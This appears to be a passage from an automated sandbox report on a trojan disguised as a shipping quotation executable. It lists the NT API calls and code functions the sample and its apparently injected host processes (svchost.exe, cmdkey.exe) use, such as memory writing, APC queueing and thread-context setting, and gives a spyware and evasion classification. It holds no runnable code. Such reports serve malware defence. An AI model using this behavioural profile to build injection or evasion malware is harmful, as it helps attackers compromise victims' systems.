              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EB0 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03972EB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D10 NtQuerySystemInformation,LdrInitializeThunk,1_2_03972D10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039734E0 NtCreateMutant,LdrInitializeThunk,1_2_039734E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974260 NtSetContextThread,1_2_03974260
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974570 NtSuspendThread,1_2_03974570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B80 NtCreateKey,1_2_03972B80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BE0 NtQueryVirtualMemory,1_2_03972BE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B10 NtAllocateVirtualMemory,1_2_03972B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B00 NtQueryValueKey,1_2_03972B00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B20 NtQueryInformationProcess,1_2_03972B20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AA0 NtQueryInformationFile,1_2_03972AA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AC0 NtEnumerateValueKey,1_2_03972AC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972A10 NtWriteFile,1_2_03972A10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039729D0 NtWaitForSingleObject,1_2_039729D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039729F0 NtReadFile,1_2_039729F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FB0 NtSetValueKey,1_2_03972FB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F00 NtCreateFile,1_2_03972F00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F30 NtOpenDirectoryObject,1_2_03972F30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E80 NtCreateProcessEx,1_2_03972E80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972ED0 NtResumeThread,1_2_03972ED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EC0 NtQuerySection,1_2_03972EC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E00 NtQueueApcThread,1_2_03972E00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E50 NtCreateSection,1_2_03972E50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DA0 NtReadVirtualMemory,1_2_03972DA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DC0 NtAdjustPrivilegesToken,1_2_03972DC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D50 NtWriteVirtualMemory,1_2_03972D50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CD0 NtEnumerateKey,1_2_03972CD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CF0 NtDelayExecution,1_2_03972CF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C10 NtOpenProcess,1_2_03972C10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C30 NtMapViewOfSection,1_2_03972C30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C20 NtSetInformationFile,1_2_03972C20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C50 NtUnmapViewOfSection,1_2_03972C50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039738D0 NtGetContextThread,1_2_039738D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973C90 NtOpenThread,1_2_03973C90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973C30 NtOpenProcessToken,1_2_03973C30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C93771 NtSuspendThread,1_2_03C93771
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C93460 NtSetContextThread,1_2_03C93460
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C93A80 NtResumeThread,1_2_03C93A80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B10 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03792B10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B00 NtQueryValueKey,LdrInitializeThunk,3_2_03792B00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_03792BC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03792B90
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B80 NtCreateKey,LdrInitializeThunk,3_2_03792B80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792A10 NtWriteFile,LdrInitializeThunk,3_2_03792A10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792AC0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03792AC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792A80 NtClose,LdrInitializeThunk,3_2_03792A80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037929F0 NtReadFile,LdrInitializeThunk,3_2_037929F0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792F00 NtCreateFile,LdrInitializeThunk,3_2_03792F00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792E50 NtCreateSection,LdrInitializeThunk,3_2_03792E50
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_03792D10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792C30 NtMapViewOfSection,LdrInitializeThunk,3_2_03792C30
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792CF0 NtDelayExecution,LdrInitializeThunk,3_2_03792CF0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037934E0 NtCreateMutant,LdrInitializeThunk,3_2_037934E0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03794260 NtSetContextThread,3_2_03794260
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03794570 NtSuspendThread,3_2_03794570
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B20 NtQueryInformationProcess,3_2_03792B20
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792BE0 NtQueryVirtualMemory,3_2_03792BE0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792AA0 NtQueryInformationFile,3_2_03792AA0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037929D0 NtWaitForSingleObject,3_2_037929D0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792F30 NtOpenDirectoryObject,3_2_03792F30
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792FB0 NtSetValueKey,3_2_03792FB0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792E00 NtQueueApcThread,3_2_03792E00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792ED0 NtResumeThread,3_2_03792ED0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792EC0 NtQuerySection,3_2_03792EC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792EB0 NtProtectVirtualMemory,3_2_03792EB0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792E80 NtCreateProcessEx,3_2_03792E80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792D50 NtWriteVirtualMemory,3_2_03792D50
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792DC0 NtAdjustPrivilegesToken,3_2_03792DC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792DA0 NtReadVirtualMemory,3_2_03792DA0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792C50 NtUnmapViewOfSection,3_2_03792C50
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792C20 NtSetInformationFile,3_2_03792C20
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792C10 NtOpenProcess,3_2_03792C10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792CD0 NtEnumerateKey,3_2_03792CD0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037938D0 NtGetContextThread,3_2_037938D0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03793C30 NtOpenProcessToken,3_2_03793C30
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03793C90 NtOpenThread,3_2_03793C90
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347EF38 NtQueryInformationProcess,NtReadVirtualMemory,3_2_0347EF38
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03483778 NtSuspendThread,3_2_03483778
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03483468 NtSetContextThread,3_2_03483468
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0348448D NtMapViewOfSection,3_2_0348448D
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03483A88 NtResumeThread,3_2_03483A88
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03484848 NtUnmapViewOfSection,3_2_03484848
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347F800 NtMapViewOfSection,3_2_0347F800
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03483D98 NtQueueApcThread,3_2_03483D98
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0069D5EB
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00691201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00691201
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0069E8F6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940D691_2_03940D69
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958CDF1_2_03958CDF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0ACEB1_2_03A0ACEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930C121_2_03930C12
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AC201_2_0394AC20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BEC201_2_039BEC20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EEC4C1_2_039EEC4C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F6C691_2_039F6C69
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEC601_2_039FEC60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039313801_2_03931380
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF3301_2_039FF330
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392D2EC1_2_0392D2EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F124C1_2_039F124C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039451C01_2_039451C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B1E01_2_0395B1E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F1131_2_0392F113
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD1301_2_039DD130
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398717A1_2_0398717A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397508C1_2_0397508C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B0D01_2_0394B0D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F70F11_2_039F70F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF6F61_2_039FF6F6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B36EC1_2_039B36EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD62C1_2_039DD62C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ED6461_2_039ED646
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF5C91_2_039FF5C9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F75C61_2_039F75C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D54901_2_039D5490
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AD4801_2_039AD480
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D1B801_2_039D1B80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397DB191_2_0397DB19
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFB2E1_2_039FFB2E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFA891_2_039FFA89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FAA01_2_0395FAA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039859C01_2_039859C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039099E81_2_039099E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B98B21_2_039B98B2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F18DA1_2_039F18DA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F78F31_2_039F78F3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039438001_2_03943800
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039498701_2_03949870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B8701_2_0395B870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B58701_2_039B5870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF8721_2_039FF872
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1FC61_2_039F1FC6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BFF401_2_039BFF40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFF631_2_039FFF63
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03941EB21_2_03941EB2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F9ED21_2_039F9ED2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03949DD01_2_03949DD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DFDF41_2_039DFDF4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFD271_2_039FFD27
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7D4C1_2_039F7D4C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D9C981_2_039D9C98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C7CE81_2_039C7CE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FCE01_2_0395FCE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943C601_2_03943C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8E3731_2_03C8E373
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8E2551_2_03C8E255
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8D7D81_2_03C8D7D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8E7141_2_03C8E714
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8CA881_2_03C8CA88
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347E3732_2_0347E373
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347E7142_2_0347E714
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347D7D82_2_0347D7D8
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347E2552_2_0347E255
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347CA882_2_0347CA88
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376E3103_2_0376E310
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037222453_2_03722245
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0382010E3_2_0382010E
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037500A03_2_037500A0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0380E0763_2_0380E076
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037627603_2_03762760
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376A7603_2_0376A760
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038167573_2_03816757
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037846703_2_03784670
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381A6C03_2_0381A6C0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377C6003_2_0377C600
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0375C6E03_2_0375C6E0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037606803_2_03760680
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0382A5263_2_0382A526
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037604453_2_03760445
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03760B103_2_03760B10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037D4BC03_2_037D4BC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03802AC03_2_03802AC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381CA133_2_0381CA13
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381EA5B3_2_0381EA5B
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381E9A63_2_0381E9A6
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0375E9A03_2_0375E9A0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037468683_2_03746868
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0378E8103_2_0378E810
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038008353_2_03800835
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037628C03_2_037628C0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037FC89F3_2_037FC89F
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037768823_2_03776882
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381EFBF3_2_0381EFBF
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376CF003_2_0376CF00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03766FE03_2_03766FE0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03780E503_2_03780E50
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03810EAD3_2_03810EAD
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037A2E483_2_037A2E48
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03752EE83_2_03752EE8
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03800E6D3_2_03800E6D
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03760D693_2_03760D69
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0375AD003_2_0375AD00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03772DB03_2_03772DB0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376AC203_2_0376AC20
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037DEC203_2_037DEC20
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03750C123_2_03750C12
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0382ACEB3_2_0382ACEB
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03778CDF3_2_03778CDF
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0380EC4C3_2_0380EC4C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381EC603_2_0381EC60
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03816C693_2_03816C69
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381F3303_2_0381F330
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037513803_2_03751380
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0374D2EC3_2_0374D2EC
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381124C3_2_0381124C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037A717A3_2_037A717A
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037FD1303_2_037FD130
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0374F1133_2_0374F113
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377B1E03_2_0377B1E0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037651C03_2_037651C0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038291433_2_03829143
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038170F13_2_038170F1
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376B0D03_2_0376B0D0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0379508C3_2_0379508C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037217073_2_03721707
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037FD62C3_2_037FD62C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381F6F63_2_0381F6F6
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037D36EC3_2_037D36EC
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038016233_2_03801623
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0380D6463_2_0380D646
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037A55503_2_037A5550
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038175C63_2_038175C6
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381F5C93_2_0381F5C9
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037F54903_2_037F5490
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037CD4803_2_037CD480
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0379DB193_2_0379DB19
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381FB2E3_2_0381FB2E
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037F1B803_2_037F1B80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381FA893_2_0381FA89
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377FAA03_2_0377FAA0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037299E83_2_037299E8
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037A59C03_2_037A59C0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037698703_2_03769870
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377B8703_2_0377B870
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037D58703_2_037D5870
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038118DA3_2_038118DA
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038178F33_2_038178F3
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037638003_2_03763800
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037D98B23_2_037D98B2
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381F8723_2_0381F872
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03803FA03_2_03803FA0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037DFF403_2_037DFF40
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03811FC63_2_03811FC6
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381FF633_2_0381FF63
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03819ED23_2_03819ED2
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03761EB23_2_03761EB2
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037FFDF43_2_037FFDF4
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03813D223_2_03813D22
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03769DD03_2_03769DD0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381FD273_2_0381FD27
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03817D4C3_2_03817D4C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03763C603_2_03763C60
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037E7CE83_2_037E7CE8
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377FCE03_2_0377FCE0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037F9C983_2_037F9C98
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347EF383_2_0347EF38
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347E3733_2_0347E373
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347E2553_2_0347E255
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347E7143_2_0347E714
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347D7D83_2_0347D7D8
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347CA883_2_0347CA88
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: String function: 00639CB3 appears 31 times
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: String function: 0064F9F2 appears 40 times
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: String function: 00650A30 appears 46 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975050 appears 58 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AE692 appears 86 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987BE4 appears 101 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B910 appears 275 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BEF10 appears 105 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 03795050 appears 58 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 037CE692 appears 86 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0374B910 appears 280 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 037A7BE4 appears 111 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 037DEF10 appears 105 times
              Source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003B53000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#070125-ELITE MARINE .exe
              Source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11153728744.0000000003EFD000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#070125-ELITE MARINE .exe
              Source: QUOTATION#070125-ELITE MARINE .exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@7/2@18/12
